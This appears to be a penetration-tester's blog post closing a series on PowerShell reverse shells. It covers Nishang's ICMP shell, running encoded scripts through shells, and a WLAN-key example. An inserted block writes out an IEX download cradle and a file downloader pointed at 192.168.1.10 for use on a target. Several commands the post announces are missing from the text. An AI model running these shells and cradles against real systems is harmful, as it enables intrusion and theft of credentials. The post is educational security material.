The current source code, without the help and credits sections:
Invoke-PowerShellIcmp is available in the Nishang repo here: https://github.com/samratashok/nishang/tree/master/Shells
Use the command below on the listener machine to disable ping (IPv4 echo) replies, so that the kernel does not answer the target's ICMP requests itself, and start the listener:
Use the command below on the target:
Awesome! An interactive PowerShell session over ICMP.
The traffic looks like this in Wireshark:
A video showing DNS shell and Invoke-PowerShellIcmp in action:
For what to do after getting access to a target with these shells, please refer to my earlier blog posts.
For any of the shells discussed over these five days, a PowerShell script can be executed with the help of the -EncodedCommand (or -e) parameter of powershell.exe.
For example, to execute Get-WLANKeys, encode it with the help of Invoke-Encode from Nishang. Make sure to remove the function declaration and the help section first: with the declaration left in, the decoded command would only define the function and never run it.
The encoded script looks like this:
Then use the encoded script in encodedcommand.txt with any of the shells:
Alternatively, use the one-liner below to execute scripts straight from a local web server:
Please note that I encountered errors in some of the shells if the encoded script is too long. I need to do more testing on this problem, so please provide feedback and report bugs.
The best way to pass parameters to modules or scripts when using -EncodedCommand is to include the parameter passing within the script itself, i.e. end the script body with the call to the function and its arguments, so nothing has to be passed on the command line.
To transfer files, the best way is to use the following one-line downloader. You can host the files on a local web server such as Apache or HFS.
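As an added example (not code from the post or from Nishang), the snippet below shows what the -EncodedCommand approach and the web-server alternatives above boil down to. It does the plain encoding that powershell.exe -EncodedCommand expects (Base64 of the UTF-16LE bytes of the script) rather than calling Invoke-Encode, bakes the parameter call into the script body as the post recommends, warns when the resulting command line is long, and ends with a download cradle and a file downloader. The script body is a stand-in for Get-WLANKeys, and the host 192.168.1.10 and file names are assumptions.

```powershell
# Added example, not part of the original post or of Nishang.

# 1. Script body with its call included, so no parameters are needed on the
#    command line. This is a stand-in for Get-WLANKeys with the function
#    declaration and help removed; the last line is the "parameter passing"
#    done inside the script itself.
$ScriptBody = @'
function Get-ProfileNames ([string]$Filter = '*') {
    netsh wlan show profiles |
        Select-String 'All User Profile' |
        ForEach-Object { $_.ToString().Split(':')[1].Trim() } |
        Where-Object { $_ -like $Filter }
}
Get-ProfileNames -Filter '*'
'@

# 2. powershell.exe -EncodedCommand expects Base64 of UTF-16LE ("Unicode") bytes,
#    not of UTF-8 bytes; using the wrong encoding yields a garbage command.
$Bytes   = [System.Text.Encoding]::Unicode.GetBytes($ScriptBody)
$Encoded = [Convert]::ToBase64String($Bytes)
$Command = "powershell.exe -NoProfile -NonInteractive -EncodedCommand $Encoded"

# 3. Round-trip check: decode again and compare, so you know the payload you
#    are about to paste into a shell is intact.
$Decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
if ($Decoded -ne $ScriptBody) { throw 'Encoding round trip failed' }

# 4. Length check before pasting: cmd.exe limits a command line to 8191
#    characters, and a long one-line command is also more likely to be mangled
#    in transit by a shell that relays it line by line. Fall back to the
#    web-server cradle when the command gets long.
if ($Command.Length -gt 8191) {
    Write-Warning ("Encoded command is {0} characters; use the download cradle instead." -f $Command.Length)
}
Set-Content -Path .\encodedcommand.txt -Value $Command

# 5. Alternatives that avoid the length problem (host and paths are assumptions):
#    run a script from a local web server (Apache/HFS) without writing it to disk,
$Cradle = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.10/Get-WLANKeys.ps1'))"
#    or transfer a file to the target.
$Downloader = "(New-Object Net.WebClient).DownloadFile('http://192.168.1.10/tool.exe', 'C:\Windows\Temp\tool.exe')"

Write-Output $Cradle
Write-Output $Downloader
```

Paste the contents of encodedcommand.txt (or $Cradle / $Downloader) into whichever shell you are using; the round-trip check and the length warning are what to look at first when an encoded script fails to run.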
Wrap up of the Week of PowerShell Shells
We have reached the end of the Week of PowerShell Shells. It was a wonderful yet tiresome experience. I learned a lot while writing these posts and hope you learned something as well. The goal was to keep the posts concise and usable without going into too much detail. In fact, to achieve this goal, no protocol-level details were discussed. I would like to believe that through this series I am able to spread awareness about the capabilities of PowerShell to more folks in the infosec community.
Continuing with the shameless self-promotion :), I would ask you to consider joining one of my upcoming two-day trainings, "PowerShell for Penetration Testers", at:
Shakacon, Honolulu (July 6-7th) – http://shakacon.org/
I hope you enjoyed reading the posts as much as I enjoyed writing them. Please leave comments, feedback and report bugs.